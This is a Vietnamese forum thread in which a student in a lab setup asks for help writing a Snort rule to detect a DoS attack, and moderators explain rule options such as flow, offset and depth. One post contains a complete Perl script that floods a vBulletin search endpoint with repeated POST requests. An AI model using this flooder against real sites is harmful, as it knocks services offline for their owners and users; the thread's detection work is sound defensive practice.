[Question] Viết Rule chống "Chiếm tài nguyên máy" trong Snort . |
31/05/2010 13:49:02 (+0700) | #1 | 211978 |
|
vminh
Member
|
0 |
|
|
Joined: 05/05/2010 22:20:20
Messages: 16
Offline
|
|
Hi all, em có mô hình thế này
Web sever(192.168.100.2)
IDS (192.168.100.21)
Hacker (192.168.100.66)
Cả 3 máy đều nối chung 1 switch
em dùng máy Hacker tấn công chiếm tài nguyên vào máy Web server, IDS ghi nhận lại sự kiện.
Em dùng wireshark để bắt gói tin này như sau
Rule của mình thế này
Code:
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"Tan cong DOS"; content:"|40 00 40 06 |" ; sid: 1000046; depth: 18; )
Hix em mò hoài....cách viết mà vẫn không bắt được chương trình này tấn công vào server...MOng mọi người giúp em với ...Em cảm ơn và chúc sức khoẻ !!!
|
|
|
|
|
[Question] Viết Rule chống "Chiếm tài nguyên máy" trong Snort . |
31/05/2010 14:32:33 (+0700) | #2 | 211984 |
|
phathuynh26
Member
|
0 |
|
|
Joined: 10/04/2010 08:55:38
Messages: 93
Offline
|
|
+ Bạn cho biết dùng chương trình gì để Dos?
+ Bạn mở file dos.rules tham khảo thêm. Đặt thêm biến flow:to_server,established.
+ Bổ sung biến content (vì dấu hiệu nhận biết Dos đâu chỉ có một)
Hope this help!
|
|
Genius is 1% inspiration and 99% perspiration - Thomas Edison |
|
|
|
[Question] Viết Rule chống "Chiếm tài nguyên máy" trong Snort . |
31/05/2010 14:36:25 (+0700) | #3 | 211985 |
|
vminh
Member
|
0 |
|
|
Joined: 05/05/2010 22:20:20
Messages: 16
Offline
|
|
phathuynh26 wrote:
+ Bạn cho biết dùng chương trình gì để Dos?
+ Bạn mở file dos.rules tham khảo thêm. Đặt thêm biến flow:to_server,established.
+ Bổ sung biến content (vì dấu hiệu nhận biết Dos đâu chỉ có một)
Hope this help!
Mình đang dùng đoạn code này để DOS
#!/usr/bin/perl
use IO::Socket;
$x = 0;
$host = "192.168.100.2";
$pth = "/";
while($x != 555555)
{
$postit = "do=process&quicksearch=1&childforums=1&exactname=1&s=&securitytoken=1236864212-555b06a6ad17659074d2817bf2fc493c5ac1208b&query=iphone&showposts=0";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nCo loi xay ra: $!\n" unless $sock;
print $sock "POST $pth"."board/search.php?do=process HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/png,image/*;q=0.8,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us,en\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "Dang DoS";
$x++;
}
Mình cũng đã đặt tham số "flow:to_server,established" như vẫn ko bắt được gói tin |
|
|
|
|
[Question] Viết Rule chống "Chiếm tài nguyên máy" trong Snort . |
01/06/2010 03:51:43 (+0700) | #4 | 212015 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
Bồ cho biết lý do tại sao bồ dùng đoạn này trong snort signature: content:"|40 00 40 06 |" ? |
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Question] Viết Rule chống "Chiếm tài nguyên máy" trong Snort . |
01/06/2010 17:29:39 (+0700) | #5 | 212081 |
|
vminh
Member
|
0 |
|
|
Joined: 05/05/2010 22:20:20
Messages: 16
Offline
|
|
Em xin chào anh conmale,
Em thấy các gói tin mà wireshark bắt được có đoạn | 40 00 40 06 | đều giống nhau, nên em nghĩ đây có thể là dấu hiệu nhận biết gói tin... nhưng khi em dùng tấn công kiểu khác thì thấy cũng có đoạn này ---> có thể em đã bị lầm...
Anh commale có thể gợi ý cho em phần nào quan trọng để có thể bắt gói tin được ko ?
Em xin cảm ơn Anh. |
|
|
|
|
[Question] Viết Rule chống "Chiếm tài nguyên máy" trong Snort . |
01/06/2010 23:56:44 (+0700) | #6 | 212113 |
|
vminh
Member
|
0 |
|
|
Joined: 05/05/2010 22:20:20
Messages: 16
Offline
|
|
Anh commale ơi, em đã đọc kí sự dos 4 của anh, nhưng em ko hiểu về 2 từ khoá này
offset:30; depth:80;: tôi muốn thâu hẹp phạm vi tìm kiếm dấu hiệu đặc thù để snort không mất thời gian đi lục tìm trong suốt một payload dài thậm thượt.
offset theo em nghĩ là nơi bắt đầu
depth là nơi cuối
em không biết hiểu như vậy có đúng không ạ ? |
|
|
|
|
[Question] Viết Rule chống "Chiếm tài nguyên máy" trong Snort . |
02/06/2010 04:04:12 (+0700) | #7 | 212114 |
Mr.Khoai
Moderator
|
Joined: 27/06/2006 01:55:07
Messages: 954
Offline
|
|
vminh,
Tất cả các loại tấn công đều thực hiện trên IPv4, bắt nguồn từ cùng một nguồn và đi đến cùng một đích đến thì trong IP headers có rất nhiều điểm tương đồng. IDS/IPS rules nói chung thường tốt nhất không nên để dành quá nhiều thời gian inspect phần IP/TCP headers (trừ những trường hợp rất đặc biệt) mà nên chú trọng coi phần payload.
offset:30; depth:80; <-- Có nghĩa là snort bắt đầu inspect từ byte thứ 30 (offset) và chỉ inspect 80 byytes mà thôi (depth) thay vì phải inspect đến cuối gói tin. Bạn có thể tham khảo thêm link này: http://packetstormsecurity.nl/papers/IDS/snort_rules.htm để biết thêm một số options cho snort rule. Tốt nhất là tìm một quyển sách về snort đọc cho có hệ thống và chắc ăn.
khoai |
|
|
|